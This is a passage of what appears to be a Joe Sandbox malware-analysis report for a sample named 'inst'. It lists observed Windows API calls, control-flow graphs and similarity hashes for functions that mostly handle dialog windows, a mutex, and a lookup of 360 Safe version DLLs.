                                                                                                                                                                      • MoveWindow.USER32(?,00000027,00000008,00000090,0000001E,00000001), ref: 001B7012
                                                                                                                                                                      • MoveWindow.USER32(?,0000003C,0000003F,00000046,00000014,00000001,?,00000027,00000008,00000131,PNG), ref: 001B7041
                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 001B704D
                                                                                                                                                                        • Part of subcall function 001960A3: ScreenToClient.USER32(?,?), ref: 001960B5
                                                                                                                                                                        • Part of subcall function 001960A3: ScreenToClient.USER32(?,?), ref: 001960C1
                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 001B7065
                                                                                                                                                                        • Part of subcall function 00177EB5: __EH_prolog3.LIBCMT ref: 00177EBC
                                                                                                                                                                      • SendMessageW.USER32(?,00000030,?,00000001), ref: 001B707E
                                                                                                                                                                      • MoveWindow.USER32(?,?,0000003C,0000003C,0000001C,00000001), ref: 001B70D1
                                                                                                                                                                      • MoveWindow.USER32(?,?,00000050,00000109,00000014,00000001), ref: 001B70EC
                                                                                                                                                                      • MoveWindow.USER32(?,0000018E,00000050,00000050,00000014,00000001), ref: 001B7106
                                                                                                                                                                        • Part of subcall function 001B4B9F: GetWindowRect.USER32(?,?), ref: 001B4BBC
                                                                                                                                                                        • Part of subcall function 001B4B9F: GetWindowTextLengthW.USER32(?), ref: 001B4BD0
                                                                                                                                                                        • Part of subcall function 001B4B9F: GetDC.USER32(?), ref: 001B4BDB
                                                                                                                                                                        • Part of subcall function 001B4B9F: _memset.LIBCMT ref: 001B4BEB
                                                                                                                                                                        • Part of subcall function 001B4B9F: GetTextMetricsW.GDI32(00000000,?), ref: 001B4BF8
                                                                                                                                                                        • Part of subcall function 001B4B9F: ReleaseDC.USER32(?,00000000), ref: 001B4C0B
                                                                                                                                                                        • Part of subcall function 001B4B9F: MoveWindow.USER32(?,?,?,00000000,?,00000001), ref: 001B4C2C
                                                                                                                                                                      • MoveWindow.USER32(?,0000003C,00000087,00000046,00000014,00000001), ref: 001B7129
                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 001B7139
                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 001B7141
                                                                                                                                                                      • ShowWindow.USER32(00000000,00000000,?), ref: 001B71A3
                                                                                                                                                                        • Part of subcall function 001A407A: ShowScrollBar.USER32(00000005,00000003,00000000,00000018,00000000,?,00000018), ref: 001A40A5
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$Move$Item$ClientRect$Show$H_prolog3ScreenText$BrushCreateLengthMessageMetricsReleaseScrollSendSolid_memset
                                                                                                                                                                      • String ID: <$CustomContrlList$PNG$X
                                                                                                                                                                      • API String ID: 3202666548-2186719467
                                                                                                                                                                      • Opcode ID: 417a8a1e468cd8c43e8121cf2dd3c33105a83c1bed422a2ae082e58502fc3a19
                                                                                                                                                                      • Instruction ID: 25ec7df2c9dc7e3bfbbb13131d0ed6e6c6a20f1ad6be73a352a86d28ca7f15d9
                                                                                                                                                                      • Opcode Fuzzy Hash: 417a8a1e468cd8c43e8121cf2dd3c33105a83c1bed422a2ae082e58502fc3a19
                                                                                                                                                                      • Instruction Fuzzy Hash: 70514271A40308BFEB21AFA4DC46FDEBBB9AF18B00F004415F645BA1E1DBB16A04CB51
                                                                                                                                                                      Function 00198F5A Relevance: 33.5, APIs: 17, Strings: 2, Instructions: 224windowthreadCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00198F8F
                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 00198F97
                                                                                                                                                                        • Part of subcall function 00197927: GetWindowLongW.USER32(-00000004,000000F0), ref: 00197949
                                                                                                                                                                        • Part of subcall function 00197927: SendMessageW.USER32(-00000004,0000007F,00000000,00000000), ref: 00197984
                                                                                                                                                                        • Part of subcall function 00197927: SendMessageW.USER32(-00000004,00000080,00000000,00000000), ref: 00197997
                                                                                                                                                                        • Part of subcall function 00197927: GetDlgItem.USER32(-00000004,0000E801), ref: 001979A4
                                                                                                                                                                        • Part of subcall function 00197927: IsWindow.USER32(00000000), ref: 001979AE
                                                                                                                                                                        • Part of subcall function 00197927: GetClientRect.USER32(-00000004,?), ref: 001979F8
                                                                                                                                                                        • Part of subcall function 00197927: GetDlgItem.USER32(-00000004,0000E801), ref: 00197A1F
                                                                                                                                                                        • Part of subcall function 00197927: IsWindow.USER32(00000000), ref: 00197A2C
                                                                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00198FC2
                                                                                                                                                                      • SetWindowLongW.USER32(?,000000EC,?), ref: 00198FCC
                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00198FF7
                                                                                                                                                                        • Part of subcall function 00196180: GetWindowLongW.USER32(?,000000F0), ref: 00196198
                                                                                                                                                                        • Part of subcall function 00196180: GetParent.USER32 ref: 001961AD
                                                                                                                                                                        • Part of subcall function 00196180: GetWindowRect.USER32(?,?), ref: 001961C7
                                                                                                                                                                        • Part of subcall function 00196180: GetWindowLongW.USER32(?,000000F0), ref: 001961DD
                                                                                                                                                                        • Part of subcall function 00196180: MonitorFromWindow.USER32(?,00000002), ref: 001961FC
                                                                                                                                                                      • GetSystemMetrics.USER32(0000000C), ref: 00199017
                                                                                                                                                                      • GetSystemMetrics.USER32(0000000B), ref: 0019901C
                                                                                                                                                                      • LoadImageW.USER32(?,00000080,00000001,00000000), ref: 00199026
                                                                                                                                                                      • SendMessageW.USER32(?,00000080,00000001,00000000), ref: 00199032
                                                                                                                                                                      • GetSystemMetrics.USER32(00000032), ref: 00199045
                                                                                                                                                                      • GetSystemMetrics.USER32(00000031), ref: 0019904A
                                                                                                                                                                      • LoadImageW.USER32(?,00000080,00000001,00000000), ref: 00199054
                                                                                                                                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00199061
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00199067
                                                                                                                                                                        • Part of subcall function 00197EF3: EnterCriticalSection.KERNEL32(0024BC7C), ref: 00197F09
                                                                                                                                                                        • Part of subcall function 00197EF3: LeaveCriticalSection.KERNEL32(0024BC7C), ref: 00197F1E
                                                                                                                                                                        • Part of subcall function 0019749D: __recalloc.LIBCMT ref: 001974E3
                                                                                                                                                                        • Part of subcall function 00197530: __recalloc.LIBCMT ref: 00197576
                                                                                                                                                                        • Part of subcall function 00195AFC: _memset.LIBCMT ref: 00195B0D
                                                                                                                                                                        • Part of subcall function 00195AFC: SHAppBarMessage.SHELL32(00000000,?), ref: 00195B2F
                                                                                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,00000001,?,?,?,?,?,?,?,002165E9,000000FF), ref: 001990D0
                                                                                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,00000000,?,?,?,?,?,?,?,002165E9,000000FF), ref: 001990D7
                                                                                                                                                                      • PostMessageW.USER32(?,00003AB1,00000000,00000000), ref: 00199121
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$Long$Message$MetricsSendSystem$CallbackCriticalDispatcherImageItemLoadRectSectionUser__recalloc$ClientCurrentEnterFromLeaveMonitorParentPostTextThread_memset
                                                                                                                                                                      • String ID: D!$PNG
                                                                                                                                                                      • API String ID: 2213159910-1994516575
                                                                                                                                                                      • Opcode ID: 142864490b41a2c690d500462387f3c949ef05940195b3eda6c7d89ca31b2703
                                                                                                                                                                      • Instruction ID: b57522bf359801b9de26d8e10d8f13a56652258f7d3dc09f281c6a347c1617af
                                                                                                                                                                      • Opcode Fuzzy Hash: 142864490b41a2c690d500462387f3c949ef05940195b3eda6c7d89ca31b2703
                                                                                                                                                                      • Instruction Fuzzy Hash: 3971AD71204204EFDB04EFA4DC89FAABBA9FF59354F110629F5518B2A1DB72E8148B61
                                                                                                                                                                      Function 001CE0D8 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 191libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 993 1ce0d8-1ce145 call 1e5421 call 1e4550 SHGetValueW 998 1ce30f 993->998 999 1ce14b-1ce152 993->999 1001 1ce311-1ce333 call 1e4647 998->1001 999->998 1000 1ce158-1ce15b 999->1000 1000->998 1002 1ce161-1ce197 call 16b680 PathCombineW PathFileExistsW 1000->1002 1007 1ce1ad-1ce22c call 17cb91 * 2 call 1e4550 PathCombineW * 3 call 16e370 1002->1007 1008 1ce199-1ce1a8 call 16dd20 1002->1008 1019 1ce2b4-1ce2d8 call 1e4550 call 16e370 1007->1019 1020 1ce232-1ce240 call 16e370 1007->1020 1008->1001 1029 1ce2ec-1ce301 call 1cd748 1019->1029 1030 1ce2da 1019->1030 1020->1019 1026 1ce242-1ce253 call 16e370 1020->1026 1026->1019 1034 1ce255-1ce266 call 16e7d0 1026->1034 1037 1ce306-1ce30d 1029->1037 1032 1ce2df-1ce2e7 call 16c8e0 1030->1032 1032->1029 1034->1019 1040 1ce268-1ce289 GetProcAddress * 2 1034->1040 1037->1032 1041 1ce28b-1ce29e 1040->1041 1042 1ce2a3-1ce2a5 1040->1042 1041->1042 1047 1ce2a0 1041->1047 1043 1ce2ac-1ce2b0 1042->1043 1044 1ce2a7-1ce2a9 1042->1044 1043->1037 1046 1ce2b2 1043->1046 1044->1043 1046->1019 1047->1042
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 001CE0F7
                                                                                                                                                                      • _memset.LIBCMT ref: 001CE11A
                                                                                                                                                                      • SHGetValueW.SHLWAPI(?,?,?,?,?,00000080,?,?,00000018), ref: 001CE13C
                                                                                                                                                                      • PathCombineW.SHLWAPI(?,?,?,?,?,?,00000018), ref: 001CE186
                                                                                                                                                                      • PathFileExistsW.SHLWAPI(?,?,?,00000018), ref: 001CE18F
                                                                                                                                                                      • _memset.LIBCMT ref: 001CE1DE
                                                                                                                                                                      • PathCombineW.SHLWAPI(?,?,360ver.dll,?,?,?,?,?,00000018), ref: 001CE1F5
                                                                                                                                                                      • PathCombineW.SHLWAPI(00000000,?,360Common.dll,?,?,?,?,?,00000018), ref: 001CE203
                                                                                                                                                                      • PathCombineW.SHLWAPI(?,?,360Base.dll,?,?,?,?,?,00000018), ref: 001CE214
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Get360SafeVersion), ref: 001CE274
                                                                                                                                                                      • GetProcAddress.KERNEL32(?,IsBetaVersion), ref: 001CE281
                                                                                                                                                                      • _memset.LIBCMT ref: 001CE2C1
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Path$Combine$_memset$AddressProc$ExistsFileH_prolog3Value
                                                                                                                                                                      • String ID: 0.0.0.0$360Base.dll$360Common.dll$360ver.dll$Get360SafeVersion$IsBetaVersion
                                                                                                                                                                      • API String ID: 2656314946-96710800
                                                                                                                                                                      • Opcode ID: 881b10ce590913c7543cc977e6dd85e2859635dddf5047164285aba53719b088
                                                                                                                                                                      • Instruction ID: dfc645d5ff710b024e3c67164268c340e0258ca30ae20ebd6d2c7cd5d1939a8b
                                                                                                                                                                      • Opcode Fuzzy Hash: 881b10ce590913c7543cc977e6dd85e2859635dddf5047164285aba53719b088
                                                                                                                                                                      • Instruction Fuzzy Hash: 75613976900689ABDF20EFA5DC89FEF77FCBB54700F00042AE51597181EB71A654CB50
                                                                                                                                                                      Function 5F4D6E40 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 157synchronizationmemoryCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(FF4173A1,?,?,?,?,?,?,?,5F54E70B,000000FF), ref: 5F4D6E84
                                                                                                                                                                      • __snwprintf.LIBCMT ref: 5F4D6E9B
                                                                                                                                                                      • CreateMutexW.KERNEL32(00000000,00000001,?,?,?,?,?,?,?,?,?,?,5F54E70B,000000FF), ref: 5F4D6EB5
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,5F54E70B,000000FF), ref: 5F4D6EC8
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,5F54E70B,000000FF), ref: 5F4D6ED8
                                                                                                                                                                      • _memset.LIBCMT ref: 5F4D6EF4
                                                                                                                                                                      • _swscanf.LIBCMT ref: 5F4D6F2B
                                                                                                                                                                      • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,5F54E70B,000000FF), ref: 5F4D6F45
                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000000,000005C0,?,?,?,?,?,?,?,?,?,?,?,?,5F54E70B), ref: 5F4D6F57
                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 5F4D6F92
                                                                                                                                                                      • __swprintf.LIBCMT ref: 5F4D6FA9
                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 5F4D6FD0
                                                                                                                                                                      • ReleaseMutex.KERNEL32(?,?,5F56CAE8), ref: 5F4D6FDE
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 5F4D7000
                                                                                                                                                                      • ReleaseMutex.KERNEL32(00000000), ref: 5F4D7023
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 5F4D702E
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Mutex$CloseException@8HandleHeapProcessReleaseThrow$AllocCreateCurrentErrorLastObjectSingleWait__snwprintf__swprintf_memset_swscanf
                                                                                                                                                                      • String ID: %s %u$1830B7BD-F7A3-4c4d-989B-C004DE465EDE
                                                                                                                                                                      • API String ID: 2967953817-332789905
                                                                                                                                                                      • Opcode ID: 0a614d5f243553b8695eca0cc887872410ae80e2b3e21d71445913d40d6e94ff
                                                                                                                                                                      • Instruction ID: da1d2583b29741651b762f2e0cc2614615f648a1d501dc0d968f58ef8cdf1d03
                                                                                                                                                                      • Opcode Fuzzy Hash: 0a614d5f243553b8695eca0cc887872410ae80e2b3e21d71445913d40d6e94ff
                                                                                                                                                                      • Instruction Fuzzy Hash: 925193F19026059BDB10DFA4CD68BEE77A8EF44720F00462EF91AE7281EB7455088BD1
                                                                                                                                                                      Function 00197927 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 258windowCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1087 197927-197936 1088 197938-19793e 1087->1088 1089 197940 1087->1089 1090 197942-197958 GetWindowLongW 1088->1090 1089->1090 1091 19795a-197961 call 18d5cf 1090->1091 1092 197966-197971 1090->1092 1091->1092 1094 19799d-1979b6 GetDlgItem IsWindow 1092->1094 1095 197973-19798c call 1962fa SendMessageW 1092->1095 1097 1979b8-1979bd 1094->1097 1098 1979d2-197a12 call 195ea9 GetClientRect 1094->1098 1095->1094 1103 19798e-197997 SendMessageW 1095->1103 1097->1098 1100 1979bf-1979c8 1097->1100 1105 197a18-197a30 GetDlgItem IsWindow 1098->1105 1106 197aca-197ace 1098->1106 1100->1098 1104 1979ca-1979cd call 196019 1100->1104 1103->1094 1104->1098 1105->1106 1108 197a36-197a6a call 195fc7 IsWindow 1105->1108 1109 197b11-197b15 1106->1109 1110 197ad0-197adb 1106->1110 1108->1106 1119 197a6c-197ac5 GetWindowRect MapWindowPoints call 196fe3 1108->1119 1114 197b1c-197b24 1109->1114 1112 197add-197aec GetClientRect 1110->1112 1113 197aee-197af9 GetWindowRect 1110->1113 1116 197aff-197b0e 1112->1116 1113->1116 1117 197b7a-197bb2 GetDlgItem GetWindowRect MapWindowPoints 1114->1117 1118 197b26-197b2e 1114->1118 1116->1109 1120 197bc0 1117->1120 1121 197bb4-197bb7 1117->1121 1122 197bfe-197c02 1118->1122 1123 197b34-197b39 1118->1123 1119->1106 1128 197bc2-197bf0 call 196fe3 1120->1128 1121->1120 1126 197bb9-197bbe 1121->1126 1124 197b3b-197b40 1123->1124 1125 197b72-197b78 1123->1125 1129 197bf5-197bf9 1124->1129 1130 197b46-197b6d call 195ec6 1124->1130 1125->1129 1126->1128 1128->1129 1129->1114 1130->1129
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetWindowLongW.USER32(-00000004,000000F0), ref: 00197949
                                                                                                                                                                      • SendMessageW.USER32(-00000004,0000007F,00000000,00000000), ref: 00197984
                                                                                                                                                                      • SendMessageW.USER32(-00000004,00000080,00000000,00000000), ref: 00197997
                                                                                                                                                                      • GetDlgItem.USER32(-00000004,0000E801), ref: 001979A4
                                                                                                                                                                      • IsWindow.USER32(00000000), ref: 001979AE
                                                                                                                                                                      • GetClientRect.USER32(-00000004,?), ref: 001979F8
                                                                                                                                                                      • GetDlgItem.USER32(-00000004,0000E801), ref: 00197A1F
                                                                                                                                                                      • IsWindow.USER32(00000000), ref: 00197A2C
                                                                                                                                                                      • IsWindow.USER32(00000000), ref: 00197A66
                                                                                                                                                                      • GetWindowRect.USER32(00000000,00000000), ref: 00197A83
                                                                                                                                                                      • GetWindowRect.USER32(-00000004,000000FF), ref: 00197AF9
                                                                                                                                                                      • GetDlgItem.USER32(-00000004,000003E8), ref: 00197B7D
                                                                                                                                                                      • GetWindowRect.USER32(00000000,00000000), ref: 00197B96
                                                                                                                                                                      • MapWindowPoints.USER32(00000000,-00000004,00000000,00000002), ref: 00197BA6
                                                                                                                                                                      • MapWindowPoints.USER32(00000000,-00000004,00000000,00000002), ref: 00197A93
                                                                                                                                                                        • Part of subcall function 00196FE3: __recalloc.LIBCMT ref: 0019702D
                                                                                                                                                                      • GetClientRect.USER32(-00000004,000000FF), ref: 00197AE6
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$Rect$Item$ClientMessagePointsSend$Long__recalloc
                                                                                                                                                                      • String ID: SCROLLBAR
                                                                                                                                                                      • API String ID: 3924995472-324577739
                                                                                                                                                                      • Opcode ID: 51a62628703143715ac59d9044e33781360d9c29fdd8f3d3ea373458768ec37b
                                                                                                                                                                      • Instruction ID: 7b29e38e9ed64c5b4d8bc6e6e78e0407c0e3e9a51f800985a0b50139a618dbf6
                                                                                                                                                                      • Opcode Fuzzy Hash: 51a62628703143715ac59d9044e33781360d9c29fdd8f3d3ea373458768ec37b
                                                                                                                                                                      • Instruction Fuzzy Hash: 3BA14C71914209AFDF15CFA8D889AAEBBF5FF18314F148529F816E72A0D7709A04CF61
                                                                                                                                                                      Function 001B65A6 Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 336windowCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 001B65AD
                                                                                                                                                                      • GetDlgItem.USER32(?,00000403), ref: 001B65D5
                                                                                                                                                                        • Part of subcall function 001B3197: InvalidateRect.USER32(?,00000000,00000000,?,?,001B0207,?), ref: 001B31AD
                                                                                                                                                                      • GetDlgItem.USER32(?,000003EF), ref: 001B665A
                                                                                                                                                                      • GetDlgItem.USER32(?,000003F1), ref: 001B66B4
                                                                                                                                                                        • Part of subcall function 001AF7D0: SetWindowLongW.USER32(?,000000FC,?), ref: 001AF7F6
                                                                                                                                                                      • GetDlgItem.USER32(?,00000411), ref: 001B66E7
                                                                                                                                                                      • GetDlgItem.USER32(000000FF,000003F6), ref: 001B6774
                                                                                                                                                                        • Part of subcall function 00196C96: SetWindowLongW.USER32(?,000000FC,?), ref: 00196CBC
                                                                                                                                                                      • GetDlgItem.USER32(000000FF,000003EA), ref: 001B67C4
                                                                                                                                                                      • ShowWindow.USER32(?,00000000,000000E5,PNG,00000004,?), ref: 001B680B
                                                                                                                                                                      • GetDlgItem.USER32(000000FF,0000040F), ref: 001B686E
                                                                                                                                                                      • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 001B68A2
                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 001B68B0
                                                                                                                                                                      • GetDlgItem.USER32(000000FF,00000410), ref: 001B68DC
                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 001B6903
                                                                                                                                                                      • GetDlgItem.USER32(000000FF,00000409), ref: 001B6932
                                                                                                                                                                        • Part of subcall function 001B134F: SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000006,?,?,00000000,?,?,?,001977F9,0000013F,PNG), ref: 001B13A1
                                                                                                                                                                      • GetDlgItem.USER32(000000FF,000003ED), ref: 001B69D2
                                                                                                                                                                        • Part of subcall function 001B62CA: __EH_prolog3.LIBCMT ref: 001B62D1
                                                                                                                                                                        • Part of subcall function 001B1610: EnableWindow.USER32(?,?), ref: 001B161B
                                                                                                                                                                        • Part of subcall function 001B1610: InvalidateRect.USER32(?,00000000,00000001,?,?,00195AF9,?), ref: 001B162A
                                                                                                                                                                        • Part of subcall function 001B1610: RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,00195AF9,?), ref: 001B163C
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Item$Window$Show$H_prolog3InvalidateLongRect$EnableMessageRedrawSend
                                                                                                                                                                      • String ID: PNG
                                                                                                                                                                      • API String ID: 1363821098-364855578
                                                                                                                                                                      • Opcode ID: a5d812c8997315a2b94b2210292dbade5ee91b93eff95328816da855dce823ae
                                                                                                                                                                      • Instruction ID: 0613aee4bcad24a5e2c1ea2f06424cc1cf9cd0581372d82276a224755f219564
                                                                                                                                                                      • Opcode Fuzzy Hash: a5d812c8997315a2b94b2210292dbade5ee91b93eff95328816da855dce823ae
                                                                                                                                                                      • Instruction Fuzzy Hash: C2D15A74900B05AFDB24EB70CC96FEAB7A5AF24750F10491CF2AB660E2DB717A14CB11
                                                                                                                                                                      Function 001D3BFD Relevance: 28.3, APIs: 10, Strings: 6, Instructions: 293comCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
